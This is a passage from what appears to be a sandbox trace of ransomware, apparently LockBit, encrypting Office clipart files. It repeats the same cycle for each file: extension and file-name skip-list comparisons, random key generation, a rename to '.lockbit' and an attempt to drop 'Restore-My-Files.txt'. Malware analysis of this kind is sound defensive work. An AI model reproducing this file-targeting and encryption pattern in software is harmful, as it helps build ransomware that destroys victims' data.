returned -1 [0167.674] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.674] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.674] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.674] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.674] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.674] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.674] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.674] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.674] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.674] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.674] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.674] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.674] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.674] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.675] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.675] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.675] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.675] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.675] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.675] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.675] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.675] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.675] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.675] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.675] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.675] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.675] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.675] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.675] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.675] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.675] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.675] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.675] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.675] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.675] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.675] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.675] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.675] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.675] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.675] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.676] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE03236_.WMF") returned 1 [0167.676] lstrcmpiW (lpString1="ntldr", lpString2="PE03236_.WMF") returned -1 [0167.676] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE03236_.WMF") returned -1 [0167.676] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE03236_.WMF") returned -1 [0167.676] lstrcmpiW (lpString1="autorun.inf", lpString2="PE03236_.WMF") returned -1 [0167.676] lstrcmpiW (lpString1="thumbs.db", lpString2="PE03236_.WMF") returned 1 [0167.676] lstrcmpiW (lpString1="iconcache.db", lpString2="PE03236_.WMF") returned -1 [0167.676] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.676] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03236_.WMF") returned=".WMF" [0167.676] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.676] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.676] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.676] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.676] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.676] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.676] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.676] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.676] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.676] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.676] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.676] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.676] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.676] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.676] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.676] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.676] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.676] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.676] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.677] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.677] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.677] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.677] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.677] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.677] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.677] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.677] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.677] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.677] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03236_.WMF.lockbit") returned 72 [0167.677] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03236_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03236_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0167.678] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.678] malloc (_Size=0x40068) returned 0x3df0008 [0167.678] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1556) returned 1 [0167.678] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.679] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.679] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.679] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.679] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0167.685] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03236_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03236_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.685] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.685] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0167.685] free (_Block=0x1fa2ed8) [0167.685] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03236_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.685] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.685] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.685] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b00e400, ftCreationTime.dwHighDateTime=0x1bd4afa, ftLastAccessTime.dwLowDateTime=0x59cdb0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2b00e400, ftLastWriteTime.dwHighDateTime=0x1bd4afa, nFileSizeHigh=0x0, nFileSizeLow=0x8b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE03241_.WMF", cAlternateFileName="")) returned 1 [0167.685] lstrcmpiW (lpString1=".", lpString2="PE03241_.WMF") returned -1 [0167.685] lstrcmpiW (lpString1="..", lpString2="PE03241_.WMF") returned -1 [0167.686] PathFindExtensionW (pszPath="PE03241_.WMF") returned=".WMF" [0167.686] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.686] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.686] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.686] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.686] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.686] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.686] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.686] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.686] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.686] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.686] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.686] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.686] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.686] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.686] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.686] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.686] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.686] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.686] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.686] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.686] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.686] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.686] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.686] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.686] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.686] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.686] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.687] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.687] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.687] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.687] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.687] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.687] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.687] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.687] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.687] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.687] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.687] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.687] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.687] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.687] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.687] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.687] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.687] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.687] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.687] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.687] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.687] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE03241_.WMF") returned 1 [0167.687] lstrcmpiW (lpString1="ntldr", lpString2="PE03241_.WMF") returned -1 [0167.687] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE03241_.WMF") returned -1 [0167.687] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE03241_.WMF") returned -1 [0167.687] lstrcmpiW (lpString1="autorun.inf", lpString2="PE03241_.WMF") returned -1 [0167.687] lstrcmpiW (lpString1="thumbs.db", lpString2="PE03241_.WMF") returned 1 [0167.687] lstrcmpiW (lpString1="iconcache.db", lpString2="PE03241_.WMF") returned -1 [0167.688] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.688] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03241_.WMF") returned=".WMF" [0167.688] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.688] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.688] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.688] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.688] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.688] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.688] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.688] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.688] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.688] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.688] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.688] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.688] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.688] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.688] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.688] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.688] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.688] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.688] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.688] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.688] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.688] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.688] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.689] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.689] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.689] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.689] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.689] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.689] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03241_.WMF.lockbit") returned 72 [0167.689] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03241_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03241_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0167.691] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.691] malloc (_Size=0x40068) returned 0x3df0008 [0167.691] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2228) returned 1 [0167.691] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.691] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.691] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.692] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.692] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.692] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.692] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0167.698] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03241_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03241_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.698] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.698] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0167.698] free (_Block=0x1fa2ed8) [0167.698] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03241_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.698] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.698] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.698] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb921ed00, ftCreationTime.dwHighDateTime=0x1bf323f, ftLastAccessTime.dwLowDateTime=0x6cdb1210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb921ed00, ftLastWriteTime.dwHighDateTime=0x1bf323f, nFileSizeHigh=0x0, nFileSizeLow=0x3380, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE03257_.WMF", cAlternateFileName="")) returned 1 [0167.698] lstrcmpiW (lpString1=".", lpString2="PE03257_.WMF") returned -1 [0167.698] lstrcmpiW (lpString1="..", lpString2="PE03257_.WMF") returned -1 [0167.698] PathFindExtensionW (pszPath="PE03257_.WMF") returned=".WMF" [0167.698] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.698] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.698] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.699] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.699] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.699] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.699] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.699] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.699] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.699] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.699] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.699] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.699] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.699] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.699] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.699] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.699] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.699] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.699] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.699] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.699] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.699] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.699] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.699] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.699] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.699] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.699] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.699] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.699] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.700] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.700] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.700] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.700] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.700] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.700] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.700] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.700] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.700] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.700] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.700] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.700] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.700] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.700] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.700] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.700] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.700] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.700] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.700] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE03257_.WMF") returned 1 [0167.700] lstrcmpiW (lpString1="ntldr", lpString2="PE03257_.WMF") returned -1 [0167.700] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE03257_.WMF") returned -1 [0167.700] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE03257_.WMF") returned -1 [0167.700] lstrcmpiW (lpString1="autorun.inf", lpString2="PE03257_.WMF") returned -1 [0167.700] lstrcmpiW (lpString1="thumbs.db", lpString2="PE03257_.WMF") returned 1 [0167.700] lstrcmpiW (lpString1="iconcache.db", lpString2="PE03257_.WMF") returned -1 [0167.700] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.700] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03257_.WMF") returned=".WMF" [0167.701] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.701] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.701] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.701] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.701] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.701] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.701] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.701] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.701] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.701] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.701] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.701] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.701] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.701] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.701] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.701] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.701] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.701] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.701] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.701] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.701] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.701] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.701] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.701] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.701] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.701] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.702] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.702] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.702] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03257_.WMF.lockbit") returned 72 [0167.702] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03257_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03257_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0167.703] 